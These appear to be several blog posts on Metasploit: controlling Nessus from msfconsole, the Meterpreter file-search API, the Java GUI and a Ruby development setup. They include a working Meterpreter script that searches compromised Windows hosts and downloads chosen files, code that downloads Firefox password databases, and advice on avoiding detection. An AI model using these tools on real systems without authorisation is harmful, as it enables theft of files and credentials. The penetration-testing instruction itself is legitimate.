New Nessus Plug-In For Metasploit

Zate Berg contributed a plug-in this week for controlling Nessus from inside msfconsole. I have to say he put in a lot of work in a very short amount of time, learning Ruby and coding this plugin in only a few weeks. The plug-in is now part of the development branch of the project, several patches have already been submitted by him, and progress has been quick.

The first step to get the new plugin is to “svn up” to the latest development version of the project, and to make sure that your Nessus server is up and running. One note: you must have already created policies on your server and have them available to the account you will use to log in to the Nessus server.

Let's load the plugin and get a listing of the available commands:

 

msf > load nessus
[*] Nessus Bridge for Nessus 4.2.x
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help 
[+] Nessus Help
[+] type nessus_help <command> for help with specific commands
Command                    Help Text
-------                    ---------
Generic Commands           
-----------------          -----------------
nessus_connect             Connect to a nessus server
nessus_logout              Logout from the nessus server
nessus_help                Listing of available nessus commands
nessus_server_status       Check the status of your Nessus Server
nessus_admin               Checks if user is an admin
nessus_server_feed         Nessus Feed Type
nessus_find_targets        Try to find vulnerable targets from a report
                           
Reports Commands           
-----------------          -----------------
nessus_report_list         List all Nessus reports
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_hosts        Get list of hosts from a report
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_host_detail  Detail from a report item on a host
                           
Scan Commands              
-----------------          -----------------
nessus_scan_new            Create new Nessus Scan
nessus_scan_status         List all currently running Nessus scans
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
                           
Plugin Commands            
-----------------          -----------------
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_plugin_family       List plugins in a family
nessus_plugin_details      List details of a particular plugin
                           
User Commands              
-----------------          -----------------
nessus_user_list           Show Nessus Users
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_passwd         Change Nessus Users Password
                           
Policy Commands            
-----------------          -----------------
nessus_policy_list         List all policies
nessus_policy_del          Delete a policy

 

As you can see, there are a lot of commands to choose from. According to Zate Berg not all commands are implemented yet; he had about 80% of them done at the time this blog post was written. With the development version we can start playing and familiarizing ourselves with the plugin as it advances. Let's connect to our Nessus server, which can be local or remote:

msf > nessus_connect carlos:$ecret4blog@192.168.1.231 ok
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
msf >

Once we have connected to our server, we can check what policies we have defined and use them to perform a scan:

 

msf > nessus_policy_list 
[+] Nessus Policy List
ID  Name     Owner   visibility
--  ----     -----   ----------
-1  General  carlos  shared
msf > nessus_scan_new -h
[*] Usage: 
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -1 homelab 192.168.1.1/24
[*] Creating scan from policy number -1, called "homelab" and scanning 192.168.1.1/24
[*] Scan started.  uid is 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196

The scan started and we got a uid of 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196. This ID is important because we will use it in the next commands to check the status of the scan:

msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  79             254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  239            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  242            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[+] Running Scans
Scan ID                                               Name     Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----     -----   -------            ------   -------------  -----------
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  carlos  15:46 Sep 26 2010  running  249            254
[*] You can:
[+] 		Import Nessus report to database : 	nessus_report_get <reportid>
[+] 		Pause a nessus scan : 			nessus_scan_pause <scanid>
msf > nessus_scan_status 
[*] Connecting to https://192.168.1.231:8834/ as carlos
[*] Authenticated
[*] No Scans Running.
[*] You can:
[*]         List of completed scans:     	nessus_report_list
[*]         Create a scan:           		nessus_scan_new <policy id> <scan name> <target(s)>

As can be seen in the example above, the host count updates as hosts are scanned; once the scan finishes, it disappears from the status info. Let's check the results of our scan:

msf > nessus_report_list 
[+] Nessus Report List
ID                                                    Name     Status     Date
--                                                    ----     ------     ----
1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196  homelab  completed  15:52 Sep 26 2010
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_hosts
[*] Usage: 
[*]        nessus_report_hosts <report id>
[*]        use nessus_report_list to list all available reports
msf > nessus_report_hosts 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
[+] Report Info
Hostname       Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
--------       --------  -----  -----  -----  -----  ----------------  --------------
192.168.1.1    24        4      23     1      0      38873             38873
192.168.1.100  5         0      5      0      0      38873             38873
192.168.1.109  3         0      3      0      0      38873             38873
192.168.1.171  214       15     61     20     133    35764             38873
192.168.1.229  12        1      11     1      0      38096             38873
192.168.1.231  38        6      27     5      6      38873             38873
192.168.1.234  20        4      20     0      0      38873             38873
192.168.1.236  28        5      26     2      0      38096             38873
192.168.1.237  5         0      5      0      0      38873             38873
192.168.1.240  159       15     62     12     85     38873             38873
192.168.1.241  32        5      30     1      1      38096             38873
192.168.1.242  31        5      29     1      1      19437             38873
192.168.1.243  6         0      6      0      0      38873             38873
192.168.1.244  23        6      23     0      0      38873             38873
192.168.1.245  17        3      16     1      0      38873             38873
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>

As can be seen from the output above, for each host I get the number of plugins that returned a positive result, broken down by severity. We can now connect to our database and import the data so we can use other modules and plugins. I will connect to a SQLite DB (NOT RECOMMENDED FOR PRODUCTION); I know it is buggy and no longer supported, but I will use it for simplicity in my example. Once the DB is created, I import the report and parse it into my MSF DB:

msf > db_connect msf.db
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Creating a new database file...
[*] Successfully connected to the database
[*] File: msf.db
msf > nessus_report_get 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
[*] importing 1ca69132-f191-d8df-5cd2-97e488acac118301371fb2d6d196
msf > 

Now that it says it finished, let's check the imported records with db_hosts:

msf > db_hosts 
Hosts
=====
address        address6  arch  comm  comments  created_at               info  mac                name                          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at               svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------               ----  ---                ----                          ---------  -------  -------  -----  -------  -----  ----------               ----  -----  ---------
192.168.1.1                                    2010-09-26 20:23:07 UTC        00:0D:B9:1D:8E:B4  ASAFW.local                                                              alive  2010-09-26 20:23:07 UTC  6     22     default
192.168.1.100                                  2010-09-26 20:23:06 UTC        00:26:BB:15:05:D8  loki.local                                                                 alive  2010-09-26 20:23:06 UTC  1     5      default
192.168.1.109                                  2010-09-26 20:23:06 UTC        7C:6D:62:E0:5E:CD  darkoperator-iPad.local                                                   alive  2010-09-26 20:23:06 UTC  0     3      default
192.168.1.171                                  2010-09-26 20:22:11 UTC        00:0C:29:A7:BD:AF                                                                             alive  2010-09-26 20:22:11 UTC  15    204    default
192.168.1.229                                  2010-09-26 20:22:09 UTC        00:23:32:34:1D:B7  AppleTV.local                                                              alive  2010-09-26 20:22:09 UTC  2     12     default
192.168.1.231                                  2010-09-26 20:22:03 UTC        00:0C:29:EE:13:87  ubuntu.local                                                               alive  2010-09-26 20:22:03 UTC  5     33     default
192.168.1.234                                  2010-09-26 20:22:03 UTC        00:1E:EC:A5:B9:86  pwnage01.local                                                             alive  2010-09-26 20:22:03 UTC  12    20     default
192.168.1.236                                  2010-09-26 20:22:01 UTC        00:0C:29:A2:19:2A  freenas.local                                                              alive  2010-09-26 20:22:01 UTC  6     28     default
192.168.1.237                                  2010-09-26 20:22:01 UTC        00:0C:29:F1:5D:96  winxp01.local                                                              alive  2010-09-26 20:22:01 UTC  0     5      default
192.168.1.240                                  2010-09-26 20:20:49 UTC        00:0C:29:F8:8F:82  win2k801.local                                                             alive  2010-09-26 20:20:49 UTC  15    154    default
192.168.1.241                                  2010-09-26 20:20:48 UTC        00:16:CB:9F:9E:11  infidel02.local                                                            alive  2010-09-26 20:20:48 UTC  7     31     default
192.168.1.242                                  2010-09-26 20:20:44 UTC        00:17:F2:99:D7:CF  infidel03.local                                                            alive  2010-09-26 20:20:44 UTC  7     30     default
192.168.1.243                                  2010-09-26 20:20:44 UTC        00:0C:29:25:89:66  win701.local                                                               alive  2010-09-26 20:20:44 UTC  1     6      default
192.168.1.244                                  2010-09-26 20:20:43 UTC        00:24:8C:5B:FC:B8  Infidel01.local                                                            alive  2010-09-26 20:20:43 UTC  12    23     default
192.168.1.245                                  2010-09-26 20:20:41 UTC        00:17:E0:3E:73:AA  TSGAP01.local                                                              alive  2010-09-26 20:20:41 UTC  3     15     default

As you can see, you can do a lot with the plugin, and it will get better with time because Zate is now addicted, like many of us, to coding for the framework. Do follow him on Twitter for updates: @zate.

New Windows Meterpreter Search Functionality

Yesterday Stephen Fewer committed code to the development version of Metasploit for the Windows version of Meterpreter for searching through the file system, using the indexing service on modern versions of Windows. The advantage of having this capability as part of the standard API is that the search is executed on the host and only matched entries are returned. Before this, all entries were returned and had to be evaluated on the attacker's machine; depending on the type of connection and the distance and path to the target, this was a very slow process that generated a lot of traffic, which could give away the actions being taken.

Here is an example of a search using the old method, taken from the enum_firefox script:

# Recursively search the given path for Firefox password and
# certificate files and download any that are found.
def frfxpswd(path,usrnm)
    @client.fs.dir.foreach(path) {|x|
        # Skip the "." and ".." directory entries
        next if x =~ /^(\.|\.\.)$/
        fullpath = path + '\\' + x
        if @client.fs.file.stat(fullpath).directory?
            # Recurse into subdirectories
            frfxpswd(fullpath,usrnm)
        elsif fullpath =~ /(cert8.db|signons.sqlite|signons3.txt|key3.db)/i
            begin
                dst = x
                dst = @logs + ::File::Separator + usrnm + dst
                print_status("\tDownloading Firefox Password file to '#{dst}'")
                @client.fs.file.download_file(dst, fullpath)
            rescue
                print_error("\t******Failed to download file #{x}******")
                print_error("\t******Browser could be running******")
            end
        end
    }
end

As can be seen at the top of the code, we have to use client.fs.dir.foreach and examine each entry, skipping the . and .. entries that are returned. Each entry is then checked with client.fs.file.stat(path).directory? to see whether the path is a directory or a file; if it is a directory, we call the function recursively to search it, and when a file is found its name is checked to see if it is a file we are looking for, in which case we take the actions we want. This is very slow when dealing with a recursive search. Now, if we want to search for files that match a specific pattern, we can use client.fs.file.search(path, pattern, recursive). As you can see, we pass this call the path from which to start the search (if we provide nil as the path it will search all drives), then the pattern to search for, and last whether the search should be recursive or not. It returns an array of hashes describing what was found:

>> client.fs.file.search("c:\\","*.sys",false)
=> [{"name"=>"hiberfil.sys", "size"=>2139795456, "path"=>"c:"}, {"name"=>"pagefile.sys", "size"=>4284719104, "path"=>"c:"}]

As can be seen, the elements of each hash are name, path, and size in bytes. If no file is found, the length of the array will be 0; if a wrong path is provided, an operation error 3 will be raised:

>> client.fs.file.search("x:\\","*.sys",false)
Rex::Post::Meterpreter::RequestError: stdapi_fs_search: Operation failed: 3
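The returned array of hashes is easy to post-process. A self-contained sketch, using sample data copied from the transcript above (no live session required):

```ruby
# Sample data in the shape client.fs.file.search returns
results = [
  {"name" => "hiberfil.sys", "size" => 2139795456, "path" => "c:"},
  {"name" => "pagefile.sys", "size" => 4284719104, "path" => "c:"}
]

# Build the same "path\name (size bytes)" lines the search command prints
lines = results.map { |f| "#{f['path']}\\#{f['name']} (#{f['size']} bytes)" }
puts lines
```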

Another advantage of this call is that on recent versions of Windows such as Vista, 7, and 2008 it will use the indexing service, giving us the ability to search Internet Explorer history and MAPI (email) entries, just by specifying iehistory as the path for Internet Explorer history or mapi for email entries. The entries found will be presented in the name element of the hash. One important note: when searching through the MAPI and Internet Explorer entries, a recursive search must be used. Now, if we want to use this from inside Meterpreter, we just use the search command:

meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.
OPTIONS:
-d <opt> The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt> The file pattern glob to search for. (e.g. *secret*.doc?)
-h Help Banner.
-r <opt> Recursivly search sub directories. (Default: true)

The options are simple. With the -d option we specify the path; if none is given, it will search all drives on the target machine. With the -f option we provide the search glob that will be used to match which file information is returned to the attacker's machine, and the -r option takes a value of true or false to specify whether the search will be recursive or not.
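The glob syntax -f accepts is the familiar shell style. Ruby's stdlib File.fnmatch uses the same rules and is handy for sanity-checking a pattern before sending it to the target (the matching itself happens host-side in Meterpreter):

```ruby
# '*' matches any run of characters, '?' matches exactly one
pattern = "*secret*.doc?"

p File.fnmatch(pattern, "topsecret.docx")  # true
p File.fnmatch(pattern, "secrets.doc")     # false: '?' needs one more character
p File.fnmatch(pattern, "notes.txt")       # false
```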

meterpreter > search -d c:\\ -f *.sys -r false
Found 2 results...
c:\hiberfil.sys (2139795456 bytes)
c:\pagefile.sys (4284719104 bytes)
meterpreter > 

Now let's create a small script to aid us in a pentest by finding, selecting, and downloading files from a target system.

Let's start by defining what we want the script to do:

· We need to be able to search for several different things at once.

· We need to save the results to a file we can edit.

· We need to use the edited file to download the files we want.

· We need to provide a start directory for the search.

· We need to be able to control whether the search is recursive or not.

So let's start by declaring our variables and setting what the options of the script will be:

@client = client
location = nil
search_blob = nil
input_file = nil
output_file = nil
recurse = false
logs = nil
@opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu." ],
    "-i" => [true, "Input file with list of files to download, one per line."],
    "-d" => [true, "Directory to start search on, search will be recursive."],
    "-f" => [true, "Search blobs separated by a |."],
    "-o" => [true, "Output File to save the full path of files found."],
    "-r" => [false, "Search subdirectories."],
    "-l" => [true, "Location where to save the files."]
)

These variables will hold the values of the options:

· location holds the path where the search will start.

· search_blob holds our search blobs.

· input_file holds the file we will feed back to the script for downloading.

· output_file holds the name and location of the file the results will be written to.

· recurse is a Boolean that determines whether the search is recursive or not.

· logs specifies where the downloaded files will be saved.
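Each entry in the option table maps a flag to [takes_argument, description]. A hypothetical, minimal stand-in for Rex::Parser::Arguments (the framework class does the real parsing) shows the convention:

```ruby
# Hypothetical stand-in for Rex::Parser::Arguments#parse:
# a flag marked true consumes the next argv element as its value
def parse_flags(table, argv)
  parsed = {}
  i = 0
  while i < argv.length
    flag = argv[i]
    takes_value, _desc = table[flag]
    if takes_value
      parsed[flag] = argv[i + 1]
      i += 2
    else
      parsed[flag] = true
      i += 1
    end
  end
  parsed
end

table = { "-r" => [false, "Search subdirectories."],
          "-f" => [true,  "Search blobs separated by a |."] }
p parse_flags(table, ["-r", "-f", "*.doc|*.pdf"])  # prints the parsed hash
```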

We add the customary usage function:

# Function for displaying help message
def usage
    print_line "Meterpreter Script for searching and downloading files that"
    print_line "match a specific pattern."
    print_line(@opts.usage)
    raise Rex::Script::Completed
end

Next we check the version of Meterpreter to make sure we are running on the Windows version and not the Java or PHP versions, which do not implement the search API call.

# Check that we are running under the right type of Meterpreter; if not, show an error message. Also make sure we have arguments; if not, show the usage of the script.
if client.platform =~ /win32|win64/
    if args.length > 0
        …………
    else
        usage
    end
else
    print_error("This script is not supported on this version of Meterpreter.")
end
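The platform check hinges on Ruby's =~ operator, which returns the match offset (truthy) or nil (falsy). Assuming client.platform reports strings containing win32, win64, or something else entirely, the branch works like this:

```ruby
# =~ returns the index where the pattern matched, or nil for no match
platform_re = /win32|win64/

p("win32" =~ platform_re)  # 0   -> truthy, the Windows branch runs
p("win64" =~ platform_re)  # 0
p("java"  =~ platform_re)  # nil -> falsy, the error branch runs
```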

Once we have all of our checks in place we will parse the options and populate our variables with the information that we need to get our tasks done.

@opts.parse(args) { |opt, idx, val|
    case opt
    when "-h"
        usage
    when "-i"
        input_file = val
    when "-o"
        output_file = val
    when "-d"
        location = val
    when "-f"
        search_blob = val.split("|")
    when "-r"
        recurse = true
    when "-l"
        logs = val
    end
}

You will see that for the -f option we split the value given, which returns an array with each element containing one of the strings we want to search for. Now that we have populated the variables with the values of the options passed to the script, we can perform the task the script was written for. First we perform our search, making sure a source directory was provided and that our search blob array contains values.
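The split on | that feeds search_blob can be checked on its own; assuming a user passed the hypothetical patterns below to -f:

```ruby
# One -f string becomes an array of independent search globs
search_blob = "*.doc|*.pdf|*pass*".split("|")

p search_blob         # ["*.doc", "*.pdf", "*pass*"]
p search_blob.length  # 3
```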

# Search for files and save their location if specified
if search_blob and search_blob.length > 0 and location
    search_blob.each do |s|
        print_status("Searching for #{s}")
        results = @client.fs.file.search(location,s,recurse)
        results.each do |file|
            print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
            file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
        end
    end
end

As you can see, we only write the results to a file if an output file was provided. By using the file_local_write Meterpreter mixin, we make sure that if the file does not exist it will be created for us, saving us from writing our own function for writing to a file. Now we add the code for reading our file after we have edited it and decided which files we want to download.

# Read log file and download those files found
if input_file and logs
    if ::File.exists?(input_file)
        print_status("Reading file #{input_file}")
        ::File.open(input_file, "r").each_line do |line|
            print_status("Downloading #{line.chomp}")
            @client.fs.file.download(logs, line.chomp)
        end
    else
        print_error("File #{input_file} does not exist!")
    end
end
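Both file helpers used above can be exercised offline. file_local_write is provided by the Metasploit script mixins; the version below is only a rough, hypothetical approximation of its create-or-append behavior, paired with the read-and-chomp loop from the download code:

```ruby
require "tmpdir"

# Hypothetical stand-in for the mixin: append a line, creating the file if needed
def file_local_write(path, data)
  ::File.open(path, "a") { |f| f.puts(data.to_s.strip) }
end

Dir.mktmpdir do |dir|
  list = File.join(dir, "found_files.txt")

  # Write phase: one full path per line, as the search loop does
  file_local_write(list, "c:\\users\\bob\\secret.doc")
  file_local_write(list, "c:\\users\\bob\\passwords.xls")

  # Read phase: chomp strips the trailing newline so the path stays clean
  paths = []
  ::File.open(list, "r").each_line { |line| paths << line.chomp }
  puts paths.length  # 2
  puts paths.first   # c:\users\bob\secret.doc
end
```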

The script can now be used to search for specific files. One thing to consider when searching is that scanning a whole disk will cause I/O activity on the system that is bound to be detected if:

1. There is monitoring software in the case of servers.

2. A user is currently using the target machine.

So it is very important to check the idle time of the user on the box, and to check the processes and installed software on the box, to make sure your actions will not be detected if you run the search throughout the whole system. A targeted search of the user's profile is a better approach in the case of a desktop system, since Windows and applications tend to save most data in those folders; the get_env script can aid in identifying the location of these folders, since it shows user and system environment variables. Also, do check the size of files before downloading them; you would not have much success trying to download a 2GB PST through a 300kb connection. I hope you found this blog post useful and informative.
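The size caution can be automated, since search already returns each file's size. A sketch with mock entries (the hashes mimic search output; the 50 MB cap is arbitrary):

```ruby
# Mock entries in the shape client.fs.file.search returns
entries = [
  {"name" => "mail.pst",   "size" => 2_147_483_648, "path" => "c:\\users\\bob"},
  {"name" => "secret.doc", "size" => 48_128,        "path" => "c:\\users\\bob"}
]

max_bytes = 50 * 1024 * 1024  # arbitrary cap for a slow link

small, large = entries.partition { |e| e["size"] <= max_bytes }
puts "download: #{small.map { |e| e['name'] }.join(', ')}"        # download: secret.doc
puts "skip (too big): #{large.map { |e| e['name'] }.join(', ')}"  # skip (too big): mail.pst
```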

Full script:

 

@client = client
location = nil
search_blob = nil
input_file = nil
output_file = nil
recurse = false
logs = nil
@opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu." ],
    "-i" => [true, "Input file with list of files to download, one per line."],
    "-d" => [true, "Directory to start search on, search will be recursive."],
    "-f" => [true, "Search blobs separated by a |."],
    "-o" => [true, "Output File to save the full path of files found."],
    "-r" => [false, "Search subdirectories."],
    "-l" => [true, "Location where to save the files."]
)
# Function for displaying help message
def usage
    print_line "Meterpreter Script for searching and downloading files that"
    print_line "match a specific pattern."
    print_line(@opts.usage)
    raise Rex::Script::Completed
end
# Check that we are running under the right type of Meterpreter
if client.platform =~ /win32|win64/
    # Parse the options
    if args.length > 0
        @opts.parse(args) { |opt, idx, val|
            case opt
            when "-h"
                usage
            when "-i"
                input_file = val
            when "-o"
                output_file = val
            when "-d"
                location = val
            when "-f"
                search_blob = val.split("|")
            when "-r"
                recurse = true
            when "-l"
                logs = val
            end
        }
        # Search for files and save their location if specified
        if search_blob and search_blob.length > 0 and location
            search_blob.each do |s|
                print_status("Searching for #{s}")
                results = @client.fs.file.search(location,s,recurse)
                results.each do |file|
                    print_status("\t#{file['path']}\\#{file['name']} (#{file['size']} bytes)")
                    file_local_write(output_file,"#{file['path']}\\#{file['name']}") if output_file
                end
            end
        end
        # Read log file and download those files found
        if input_file and logs
            if ::File.exists?(input_file)
                print_status("Reading file #{input_file}")
                ::File.open(input_file, "r").each_line do |line|
                    print_status("Downloading #{line.chomp}")
                    @client.fs.file.download(logs, line.chomp)
                end
            else
                print_error("File #{input_file} does not exist!")
            end
        end
    else
        usage
    end
else
    print_error("This script is not supported on this version of Meterpreter.")
end

Metasploit New GUI

A new GUI for Metasploit was added to the Metasploit SVN repository yesterday by ScriptJunkie. This is the first development version as part of the framework, and it will be improved and worked on as time progresses. The new GUI is multi-platform and based on Java; the NetBeans project for it can be found in the external/source/gui/msfguijava/ directory for those who want to contribute and have ninja skills with Java and user interfaces. The GUI can be run by invoking the msfgui script at the base of the Metasploit directory:

./msfgui

This script simply executes the following command:

java -jar `dirname $0`/data/gui/msfgui.jar
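The backtick expression works because `dirname $0` resolves to the directory the msfgui launcher lives in, so the jar is found no matter what the current working directory is. The path below is made up, just to show what dirname returns:

```shell
# dirname strips the final path component, leaving the script's directory
# (/opt/msf3 is a hypothetical install location)
dirname /opt/msf3/msfgui
```

So if msfgui lives in /opt/msf3, the command expands to `java -jar /opt/msf3/data/gui/msfgui.jar`.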

To be able to run this GUI, Java must be installed on the machine. When you run the command, you should be greeted by a splash screen, followed by this user interface:

image

This interface does not start a local msfrpcd instance on launch, since it can also be used to connect to a remote msfrpcd session on another host. To start a msfrpcd session on a host so you can connect to it remotely with msfgui, run the following command on that host:

./msfrpcd -S -U MetaUser -P Securepass -p 1337

Here we tell the msfrpcd daemon to start with SSL disabled, since there is no support for it right now; we specify the user with the -U switch, the password with the -P switch, and the port to listen on for inbound connections with the -p switch. The service will bind to the 0.0.0.0 address, so it will listen on all interfaces; if you want it to bind to a specific interface, just tell it which IP address to bind to with the -a switch. When you run the command above, the output should look something like this:

loki:msf3 cperez$ ./msfrpcd -S -U MetaUser -P Securepass -p 1337
[*] XMLRPC starting on 0.0.0.0:1337 (NO SSL):Basic...
[*] XMLRPC initializing...
[*] XMLRPC backgrounding...

Once it is up, we just use the Connect to msfrpcd option in the File menu:

image

This will bring up the following screen:

image

 

There we just enter the data we set up on our remote host. We can also start a new connection from this screen, and even change the path of our Metasploit folder to another copy if we wish, using the Change path button.

To start a new session with the local copy, just select the Start new msfrpcd option from the File menu; this will automatically start a msfrpcd session for you using the copy of Metasploit from which you launched msfgui. Once started, we can then interact with it. Let's launch a multi handler to receive some Meterpreter connections:

image
Once we select the multi handler, a screen will appear that lets us choose our payload; depending on the payload, we will be able to set its parameters:

image

 

image
Once we have set the options needed for our shell, we just hit Run Exploit to launch the job, and it should appear in the jobs screen as shown below:

image

When the Meterpreter session is received and established it will appear in the Sessions window and we can interact with it.

image

To interact with our shell, we can simply select it and left-click on it to bring up the options of what we can do. One of the things I like about what is being done with the GUI is the way the Meterpreter scripts were integrated as actions on the menu, with easy-to-understand groupings, as well as the most common commands.

image
Here is the screen we would see if we selected Windows Enumeration from the System Information group; this launches the winenum script and we can see its progress. We can even enter commands in the dialog box below and hit Submit to send a command to the Meterpreter session once the script is finished.


image

We can even decide to access the server's file system and interact with it.

image

For pentesters: do check, under post exploitation, the report feature for an HTML activity log of what was done in the shell and Meterpreter sessions. I invite you to play with the other options, modules, and menu items, and to provide feedback, including bug reports and feature requests for things to add to the GUI. If you are a Java ninja, patches and code are also welcome; you can contribute at http://www.metasploit.com/redmine/projects/framework

Setting up RVM and IRB for Metasploit Development in Backtrack

In this blog post I will cover the installation of a base Ruby environment for use in developing and testing Metasploit modules, exploits, and scripts. The instructions are based on a Backtrack 4 system, since it has most of the dependencies already set up for many of the components that will be installed, but they can easily be adapted to any Ubuntu-based Linux distro.

The first step is to make sure we are running the latest version of all packages on the system. This is easily done with the aptitude package manager: from a terminal, update the package database and upgrade all necessary packages by running the following as root:

aptitude update && aptitude upgrade 

Once it finishes and all current packages are upgraded, we install the Git distributed version control system by running the following command as root:

aptitude install git-core 

Once Git is installed, we will install the Ruby Version Manager (RVM). This lets us keep different versions of Ruby on the system, each with its own gem repository, and change, update, and manage them all with a single tool. We will install RVM using the script the project provides, by running the following command:

bash < <( curl http://rvm.beginrescueend.com/releases/rvm-install-head ) 

Once it is finished, open your .bashrc file in your favorite text editor and add the following lines to the end of the file:

 # Load RVM source
 if [[ -s "/usr/local/rvm/scripts/rvm" ]] ; then source "/usr/local/rvm/scripts/rvm" ; fi
 # Enable tab completion in RVM
 [[ -r /usr/local/rvm/scripts/completion ]] && source /usr/local/rvm/scripts/completion

Save and close the file. Next, run the following command to load RVM into the current shell:

 source /usr/local/rvm/scripts/rvm

   
Now we will install two versions of Ruby, 1.8.7 and 1.9.1:

 rvm install 1.9.1
 rvm install 1.8.7

Even though you can install several versions with a single command, I prefer to install them one by one as shown above. You can test that version switching works by running the following commands:

 rvm 1.9.1
 ruby -v
 rvm 1.8.7
 ruby -v 

Each time we invoke the Ruby interpreter with the -v switch, we should see that the version has changed. Next we need to install the necessary Ruby gems into the gem repository of each Ruby version; we achieve this with the rvm command:

 rvm gem install hpricot
 rvm gem install sqlite3-ruby
 rvm gem install pg
 rvm gem install wirble
 rvm gem install mysql 

Once all the gems are installed, we set Ruby 1.9.1 as our default version with the following command:

 rvm 1.9.1 --default 

Now that we have our base Ruby environment, we can proceed to configure some global parameters for the Interactive Ruby Shell, also known as IRB. IRB lets us interact directly with the Ruby interpreter, so we can test and validate commands and API calls. The following steps are optional; take whatever parts of the configuration best fit your personal style and needs. First we create the file:

 touch ~/.irbrc 

This file is read by IRB every time we run it. IRB can be invoked from the regular Bash shell, from inside msfconsole, and from inside a Meterpreter session. The libraries and methods loaded will depend on where you run the irb command. You can load those libraries from inside the .irbrc file, but for simplicity I will only cover some general settings and code that can later be expanded as your skill with Ruby and the Framework progresses. For a bit more information on IRB visit: http://ruby-doc.org/docs/ProgrammingRuby/html/irb.html
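If you do decide to load libraries from .irbrc, a missing gem under one Ruby version would otherwise abort IRB startup, so one option is a guarded require. A minimal sketch; safe_require is a hypothetical helper name, not part of the file built in this post:

```ruby
# Guarded require: load a library if it is available, but do not abort
# IRB startup when the gem is missing under the current Ruby version.
def safe_require(lib)
  require lib
  true
rescue LoadError
  warn "#{lib} not available, skipping"
  false
end

safe_require 'rubygems'
safe_require 'wirble'   # only loaded if the gem is actually installed
```

This way the same .irbrc works under both 1.8.7 and 1.9.1 even if their gem repositories differ.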

Let's start by adding a line that will let us know that the .irbrc file was loaded:

 puts "Loaded ~/.irbrc" 

Next we make sure that RubyGems is always loaded when working inside IRB:

 require 'rubygems'

   
Next we load the Wirble library so we can have syntax coloring, history, and tab autocompletion inside IRB:

 require 'wirble'


Let's also add IRB's own tab autocompletion, which in my experience is faster and, in Ruby 1.9.1, differentiates methods depending on the object's type:

 require 'irb/completion' 

Now we initialize Wirble and enable its colorizing:

 Wirble.init
 Wirble.colorize

Next we add auto indentation for IRB:

 IRB.conf[:AUTO_INDENT] = true 

Next, to simplify enumerating methods when we want a quick look at what we can do with an object, we reopen the Object class and add a method called local_methods that lists only the methods not inherited from Object:

class Object
  # get all the methods for an object that aren't basic methods from Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end 
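To see what this buys us, here is a quick self-contained run of the same patch outside IRB (the exact method list will vary by Ruby version):

```ruby
# The same Object patch as in the .irbrc, repeated here so the
# example runs on its own.
class Object
  # get all the methods for an object that aren't basic methods from Object
  def local_methods
    (methods - Object.instance_methods).sort
  end
end

# Quick look at what String adds on top of Object:
puts "msf".local_methods.first(5).inspect
```

Inside IRB you would simply type `"msf".local_methods` and get a sorted list of the String-specific methods, without the noise of everything Object already provides.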

Our file should now look like this:

puts "Loaded ~/.irbrc"
# Load Libraries
require 'rubygems'
require 'wirble'
require 'irb/completion' 
# Enable Indentation in irb
IRB.conf[:AUTO_INDENT] = true 
# Enable Syntax Coloring 
Wirble.init
Wirble.colorize 
# get all the methods for an object that aren't basic methods from Object
class Object
  def local_methods
